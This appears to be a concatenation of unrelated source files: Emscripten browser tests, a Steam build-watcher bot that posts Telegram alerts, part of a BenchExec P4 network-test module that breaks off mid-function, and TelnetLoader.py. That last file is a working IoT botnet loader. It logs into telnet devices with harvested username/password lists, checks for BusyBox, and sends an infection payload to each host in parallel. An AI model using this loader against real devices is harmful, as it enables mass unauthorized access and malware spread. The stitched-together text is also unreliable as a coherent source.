create_test_file(src, self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
self.compile_btest(['src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in a browser with no native atob function
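# SINGLE_FILE embeds the wasm and the preloaded data as base64 data URIs, so with both atob()
# and fetch() removed the runtime has to fall back to its own JS base64 decoder.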
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1']
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = ['src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
create_test_file('page.c', self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation, letting us affect heap copying
# or lack thereof
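# --no-heap-copy keeps the packaged file data in a separate typed array instead of copying it
# into the Emscripten heap, which interacts with ALLOW_MEMORY_GROWTH builds like this one.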
for file_packager_args in [[], ['--no-heap-copy']]:
print(file_packager_args)
run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'] + file_packager_args)
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.compile_btest(['test.c', '-o', 'test.html', '-O3'])
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the requested modularize mode
self.compile_btest(['test.c', '-o', 'test.js', '-O3'] + args)
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# here we also eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
([], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
if not os.path.exists(filesystem_path):
os.makedirs(filesystem_path)
# compile the code with the requested modularize mode
self.compile_btest(['test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_modularize_Module_input(self):
self.btest(path_from_root('tests', 'browser', 'modularize_Module_input.cpp'), '0', args=['--shell-file', path_from_root('tests', 'browser', 'modularize_Module_input.html'), '-s', 'MODULARIZE_INSTANCE=1'])
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-std=c++11', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that it is possible to load two asm.js compiled programs on one page when both --separate-asm and MODULARIZE=1 are used, by assigning
# the two programs different asm module names to ensure they do not conflict when being XHRed in.
@no_wasm_backend('this tests asm.js support')
def test_two_separate_asm_files_on_same_page(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'two_separate_asm_files.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page1.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module1', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage1["asm"]']
print(cmd)
subprocess.check_call(cmd)
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page2.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module2', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage2["asm"]']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
# Tests that it is possible to encapsulate asm.js compiled programs by using --separate-asm + MODULARIZE=1. See
# encapsulated_asmjs_page_load.html for the example.
@no_wasm_backend('this tests asm.js support')
def test_encapsulated_asmjs_page_load(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'encapsulated_asmjs_page_load.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'a.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=EmscriptenCode', '-s', 'SEPARATE_ASM_MODULE_NAME="var EmscriptenCode"']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
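# USE_OFFSET_CONVERTER makes the runtime build a WasmOffsetConverter so that wasm call-stack
# addresses can be mapped back to function names (used here together with pthreads and -g4).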
@requires_threads
@no_fastcomp('offset converter is not supported on fastcomp')
def test_offset_converter(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
|
gameservers.py
|
import sys
import os
import inspect
currentdir = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
import gevent.monkey
gevent.monkey.patch_all()
import time
import logging
from threading import Thread
from steam.enums import EResult
from steam.client import SteamClient
from csgo.client import CSGOClient
import telebot
import config
from addons import file_manager, strings
from web import GameVersion
logging.basicConfig(
level=logging.DEBUG, format='%(asctime)s | %(threadName)s | %(name)s: %(message)s', datefmt='%H:%M:%S — %d/%m/%Y')
client = SteamClient()
client.set_credential_location(config.STEAM_CREDS_PATH)
cs = CSGOClient(client)
gv = GameVersion()
@client.on("error")
def handle_error(result):
print(f"\n> Logon result: {repr(result)}\n")
@client.on("channel_secured")
def send_login():
if client.relogin_available:
client.relogin()
@client.on("connected")
def handle_connected():
print(f"\n> Connected to {client.current_server_addr}\n")
@client.on("reconnect")
def handle_reconnect(delay):
print(f"\n> Reconnect in {delay}s...\n")
@client.on("disconnected")
def handle_disconnect():
print("\n> Disconnected.\n")
if client.relogin_available:
print("\n> Reconnecting...\n")
client.reconnect(maxdelay=30)
@cs.on('connection_status')
def gc_ready(status):
if status == 0:
game_coordinator = 'normal'
elif status == 1:
game_coordinator = 'internal server error'
elif status == 2:
game_coordinator = 'internal bot error'
elif status == 3:
game_coordinator = 'reloading'
elif status == 4:
game_coordinator = 'internal Steam error'
else:
game_coordinator = 'unknown'
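# Note: the cache file is assumed to be a flat JSON object whose key order matches the indices
# used below (index 2 is expected to be 'game_coordinator'); cache_key_list just records that order.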
cacheFile = file_manager.readJson(config.CACHE_FILE_PATH)
cache_key_list = []
for keys, values in cacheFile.items():
cache_key_list.append(keys)
if game_coordinator != cacheFile['game_coordinator']:
file_manager.updateJson(
config.CACHE_FILE_PATH, game_coordinator, cache_key_list[2])
@client.on("logged_on")
def handle_after_logon():
t1 = Thread(target = depots)
t1.start()
t2 = Thread(target = gc)
t2.start()
def depots():
while True:
try:
for keys, values in client.get_product_info(apps=[730], timeout=15).items():
for k, v in values.items():
currentDPRBuild = v['depots']['branches']['dpr']['buildid']
currentPublicBuild = v['depots']['branches']['public']['buildid']
try:
currentRKVBuild = v['depots']['branches']['rkvtest']['buildid']
except Exception as e:
# The rkvtest branch is not always present; use None so the comparison below is skipped.
currentRKVBuild = None
print(f'\n> Error fetching RKV build:\n\n{e}\n')
try:
currentTestBuild = v['depots']['branches']['test']['buildid']
except Exception as e:
# The test branch is not always present either.
currentTestBuild = None
print(f'\n> Error fetching Test build:\n\n{e}\n')
except Exception as e:
print(f'\n> Error trying to fetch depots:\n\n{e}\n')
time.sleep(45)
continue
cacheFile = file_manager.readJson(config.CACHE_FILE_PATH)
cache_key_list = []
for keys, values in cacheFile.items():
cache_key_list.append(keys)
if currentDPRBuild != cacheFile['dpr_build_ID']:
file_manager.updateJson(
config.CACHE_FILE_PATH, currentDPRBuild, cache_key_list[1])
send_alert(currentDPRBuild, cache_key_list[1])
t3 = Thread(target = ds)
t3.start()
if currentPublicBuild != cacheFile['public_build_ID']:
file_manager.updateJson(
config.CACHE_FILE_PATH, currentPublicBuild, cache_key_list[0])
send_alert(currentPublicBuild, cache_key_list[0])
t4 = Thread(target = gv_updater)
t4.start()
if currentRKVBuild is not None and currentRKVBuild != cacheFile['rkvtest']:
file_manager.updateJson(
config.CACHE_FILE_PATH, currentRKVBuild, cache_key_list[25])
send_alert(currentRKVBuild, cache_key_list[25])
if currentTestBuild is not None and currentTestBuild != cacheFile['test']:
file_manager.updateJson(
config.CACHE_FILE_PATH, currentTestBuild, cache_key_list[26])
send_alert(currentTestBuild, cache_key_list[26])
time.sleep(45)
def gc():
cs.launch()
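# Polls app 741 for a change-number bump; sends one alert and exits, or gives up after 90 minutes.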
def ds():
timeout = time.time() + 60*90
while True:
try:
for keys, values in client.get_product_info(apps=[741], timeout=15).items():
for k, v in values.items():
currentDSchangenumber = v['_change_number']
except Exception as e:
print(f'\n> First DS run error:\n\n{e}\n')
time.sleep(45)
continue
while True:
try:
for keys, values in client.get_product_info(apps=[741], timeout=15).items():
for k, v in values.items():
newDSchangenumber = v['_change_number']
except Exception as e:
print(f'\n> Second DS run error:\n\n{e}\n')
time.sleep(45)
continue
if newDSchangenumber != currentDSchangenumber:
send_alert(newDSchangenumber, 'ds')
sys.exit()
elif time.time() > timeout:
sys.exit()
time.sleep(45)
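# Polls the web API until the reported client version differs from the cached one, then updates
# all four version-related cache keys and lets the thread exit.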
def gv_updater():
while True:
try:
newValue = gv.get_gameVer()
except Exception as e:
print(f'\n> Error trying to get new version:\n\n{e}\n')
time.sleep(45)
continue
cacheFile = file_manager.readJson(config.CACHE_FILE_PATH)
oldVersion = cacheFile['client_version']
keyList = ['client_version', 'server_version', 'patch_version', 'version_timestamp']
if newValue[0] != oldVersion:
for val, key in zip(newValue, keyList):
file_manager.updateJson(
config.CACHE_FILE_PATH, val, key)
sys.exit()
time.sleep(45)
def send_alert(newVal, key):
if key == 'public_build_ID':
text = strings.notificationTextUPD.format(newVal)
elif key == 'dpr_build_ID':
text = strings.notificationTextDPR.format(newVal)
elif key == 'rkvtest':
text = strings.notificationTextRKV.format(newVal)
elif key == 'test':
text = strings.notificationTextTST.format(newVal)
elif key == 'ds':
text = strings.notificationTextDS.format(newVal)
bot = telebot.TeleBot(config.BOT_TOKEN)
if not config.TEST_MODE:
chat_list = [config.CSGOBETACHAT, config.CSGONOTIFY, config.AQ]
else:
chat_list = [config.AQ]
for chatID in chat_list:
msg = bot.send_message(
chatID, text, parse_mode='html', disable_web_page_preview=True)
if chatID == config.CSGOBETACHAT:
bot.pin_chat_message(msg.chat.id, msg.id,
disable_notification=True)
try:
result = client.login(username=config.STEAM_USERNAME,
password=config.STEAM_PASS)
if result != EResult.OK:
print(f"\n> Failed to login: {repr(result)}\n")
raise SystemExit
client.run_forever()
except KeyboardInterrupt:
if client.connected:
print("\n> Logout\n")
client.logout()
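# --- Illustrative sketch (not part of this module) ---
# The addons.file_manager helpers used above are not shown here. A minimal implementation
# consistent with how readJson()/updateJson() are called in this file could look like the
# commented code below; the names and JSON layout are assumptions, not the real addon code.
#
#   import json
#
#   def readJson(path):
#       with open(path) as f:
#           return json.load(f)
#
#   def updateJson(path, value, key):
#       data = readJson(path)
#       data[key] = value
#       with open(path, 'w') as f:
#           json.dump(data, f, indent=4)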
|
TelnetLoader.py
|
import sys, re, os, socket, time
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list]")
cmd="" #payload to send
info = open(str(sys.argv[1]),'a+')
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def infect(ip,username,password):
ip = str(ip).rstrip("\n")
username = username.rstrip("\n")
password = password.rstrip("\n")
try:
tn = socket.socket()
tn.settimeout(10)
tn.connect((ip,23))
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "ogin")
if "ogin" in hoho:
tn.send(username + "\n")
time.sleep(0.09)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
time.sleep(0.8)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if ">" in prompt and "ONT" not in prompt:
try:
success = False
tn.send("cat | sh" + "\n")
time.sleep(0.1)
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
try:
success = False
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("shell" + "\n")
time.sleep(0.01)
tn.send("help" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
else:
tn.close()
if success == True:
try:
tn.send(cmd + "\n")
print "\033[32m[\033[31m+\033[32m] \033[33mPayload Sent!\033[32m %s"%(ip)
time.sleep(20)
tn.close()
except:
tn.close()
tn.close()
except Exception:
tn.close()
for x in info:
try:
if ":23 " in x:
x = x.replace(":23 ", ":")
xinfo = x.split(":")
session = Process(target=infect, args=(xinfo[0].rstrip("\n"),xinfo[1].rstrip("\n"),xinfo[2].rstrip("\n"),))
session.start()
ip=xinfo[0]
username=xinfo[1]
password=xinfo[2]
time.sleep(0.01)
except:
pass
session.join()
|
p4execution.py
|
# SPDX-FileCopyrightText: 2020-2021 CASTOR Software Research Centre
# <https://www.castor.kth.se/>
# SPDX-FileCopyrightText: 2020-2021 Johan Paulsson
# SPDX-License-Identifier: Apache-2.0
import os
import logging
import time
import threading
from benchexec import systeminfo
from p4.p4_run_setup import P4SetupHandler
from p4.counter import Counter
from benchexec import tooladapter
from benchexec import util
from benchexec import BenchExecException
# File handling
from shutil import copyfile, rmtree
import json
from distutils.dir_util import copy_tree
try:
import docker
except ModuleNotFoundError:
raise BenchExecException(
"Python-docker package not found. Try reinstalling python docker module"
)
try:
from pyroute2 import IPRoute
from pyroute2 import NetNS
except ModuleNotFoundError:
raise BenchExecException(
"pyroute2 python package not found. Try reinstalling pyroute2"
)
STOPPED_BY_INTERRUPT = False
# Static Parameters
MGNT_NETWORK_SUBNET = "172.19" # Subnet 192.19.x.x/16
NODE_IMAGE_NAME = "basic_node"
SWITCH_IMAGE_NAME = "switch_bmv2"
PTF_IMAGE_NAME = "ptf_tester"
class P4Execution(object):
"""
This class executes P4 benchmarks. It creates a docker container for each
device in the network, creates virtual ethernet connections between all the devices and, finally,
sets up a test container connected to all the nodes in the network.
"""
def __init__(self):
self.nodes = None # Set by init
self.switches = None # Set by init
self.ptf_tester = None # Set by init
# Includes all nodes and switches, not the ptf tester
self.nr_of_active_containers = Counter()
self.client = None
self.node_networks = []
self.mgnt_network = None
def init(self, config, benchmark):
"""
This function sets up the docker network used to execute the test.
As a result, it needs root permissions for the setup part.
"""
tool_locator = tooladapter.create_tool_locator(config)
benchmark.executable = benchmark.tool.executable(tool_locator)
benchmark.tool_version = benchmark.tool.version(benchmark.executable)
# Read test inputs paths
(
self.switch_source_path,
self.ptf_folder_path,
self.network_config_path,
) = self.read_folder_paths(benchmark)
if not os.path.isdir(self.switch_source_path):
logging.critical(
"Switch folder path not found: %s", self.switch_source_path
)
raise BenchExecException(
"Switch folder path not found. Look over setup definition"
)
if not os.path.isdir(self.ptf_folder_path):
logging.critical(
"Ptf test folder path not found: %s", self.ptf_folder_path
)
raise BenchExecException(
f"Ptf test folder path not found: {self.ptf_folder_path}"
)
if not self.switch_source_path or not self.ptf_folder_path:
raise BenchExecException(
"Switch or Ptf folder path not defined."
f"Switch path: {self.switch_source_path} Folder path: {self.ptf_folder_path}"
)
# Extract network config info
if not self.network_config_path:
logging.error("No network config file was defined")
raise BenchExecException("No network config file was defined")
with open(self.network_config_path) as json_file:
self.network_config = json.load(json_file)
setup_is_valid = self.network_file_isValid()
if not setup_is_valid:
raise BenchExecException("Network config file is not valid")
# Container setup
self.client = docker.from_env()
self.switch_target_path = "/app"
self.nrOfNodes = len(self.network_config["nodes"])
try:
# Create the ptf tester container
mount_ptf_tester = docker.types.Mount(
"/app", self.ptf_folder_path, type="bind"
)
try:
self.ptf_tester = self.client.containers.create(
PTF_IMAGE_NAME,
detach=True,
name="ptfTester",
mounts=[mount_ptf_tester],
tty=True,
)
except docker.errors.APIError:
self.ptf_tester = self.client.containers.get("ptfTester")
# Create node containers
self.nodes = []
for node_name in self.network_config["nodes"]:
try:
self.nodes.append(
self.client.containers.create(
NODE_IMAGE_NAME, detach=True, name=node_name
)
)
except docker.errors.APIError:
logging.error("Failed to setup node container.")
self.switches = []
# Each switch needs their own mount copy
for switch_info in self.network_config["switches"]:
mount_path = self.create_switch_mount_copy(switch_info)
mount_switch = docker.types.Mount(
self.switch_target_path, mount_path, type="bind"
)
try:
self.switches.append(
self.client.containers.create(
SWITCH_IMAGE_NAME,
detach=True,
name=switch_info,
mounts=[mount_switch],
)
)
except docker.errors.APIError:
self.switches.append(self.client.containers.get(switch_info))
logging.info("Setting up network")
self.setup_network()
self.connect_nodes_to_switch()
except docker.errors.APIError as e:
self.close()
raise BenchExecException(str(e))
def execute_benchmark(self, benchmark, output_handler):
"""
Executes the benchmark.
"""
self.start_container_listening()
# Wait until all nodes and switches are setup
while self.nr_of_active_containers.value < len(self.nodes + self.switches):
time.sleep(1)
test_dict = self.read_tests()
setup_handler = P4SetupHandler(benchmark, test_dict)
setup_handler.update_runsets()
# Read all switch setup logs
for switch in self.switches:
switch_log_file = (
f"{self.switch_source_path}/{switch.name}/log/switch_log.txt"
)
switch_command_output = (
f"{self.switch_source_path}/{switch.name}/table_command_output.txt"
)
switch_log_file_new = f"{benchmark.log_folder}{switch.name}_Setup.log"
switch_command_output_new = (
f"{benchmark.log_folder}{switch.name}_table_entry.log"
)
copyfile(switch_log_file, switch_log_file_new)
# Check for table output file
if os.path.exists(switch_command_output):
copyfile(switch_command_output, switch_command_output_new)
else:
logging.info("No tables was loaded for switch: %s, {switch.name}")
# Clear log file
with open(switch_log_file, "r+") as f:
f.truncate()
if output_handler.compress_results:
self.move_file_to_zip(switch_log_file_new, output_handler, benchmark)
if os.path.exists(switch_command_output):
self.move_file_to_zip(
switch_command_output_new, output_handler, benchmark
)
for runSet in benchmark.run_sets:
if STOPPED_BY_INTERRUPT:
break
if not runSet.should_be_executed():
output_handler.output_for_skipping_run_set(runSet)
elif not runSet.runs:
output_handler.output_for_skipping_run_set(
runSet, "because it has no files"
)
output_handler.output_before_run_set(runSet)
for run in runSet.runs:
# Create ptf command depending on nr of nodes
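# ptf's "nn" platform talks to the data plane over nanomsg sockets; each --device-socket entry
# maps ports 0-64 of a device id to that node's management-network address on port 10001.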
command = f"ptf --test-dir /app {run.identifier}"
for node in self.nodes:
node_config = self.network_config["nodes"][node.name]
command += f" --device-socket {node_config['id']}-{{0-64}}@tcp://{MGNT_NETWORK_SUBNET}.0.{node_config['id'] + 3}:10001"
command += " --platform nn"
return_code, test_output = self._execute_benchmark(run, command)
test_output = test_output.decode("utf-8")
try:
with open(run.log_file, "w") as ouputFile:
for _i in range(6):
ouputFile.write("\n")
# for result in test_results:
ouputFile.write(test_output + "\n")
except OSError:
print("Failed")
values = {}
values["exitcode"] = util.ProcessExitCode.from_raw(return_code)
run._cmdline = command.split(" ")
run.set_result(values)
# Save all switch log_files
for switch in self.switches:
switch_log_file = (
f"{self.switch_source_path}/{switch.name}/log/switch_log.txt"
)
switch_log_file_new = f"{run.log_file[:-4]}_{switch.name}.log"
copyfile(switch_log_file, switch_log_file_new)
# Clear the log file for next test
with open(switch_log_file, "r+") as f:
f.truncate()
if output_handler.compress_results:
self.move_file_to_zip(
switch_log_file_new, output_handler, benchmark
)
print(run.identifier + ": ", end="")
output_handler.output_after_run(run)
output_handler.output_after_benchmark(STOPPED_BY_INTERRUPT)
self.close()
def _execute_benchmark(self, run, command):
return self.ptf_tester.exec_run(command, tty=True)
def setup_network(self):
"""
Creates the management network and connects all nodes and the ptf tester
to it.
"""
try:
ipam_pool = docker.types.IPAMPool(
subnet=MGNT_NETWORK_SUBNET + ".0.0/16", # "172.19.0.0/16",
gateway=MGNT_NETWORK_SUBNET + ".0.1", # "172.19.0.1"
)
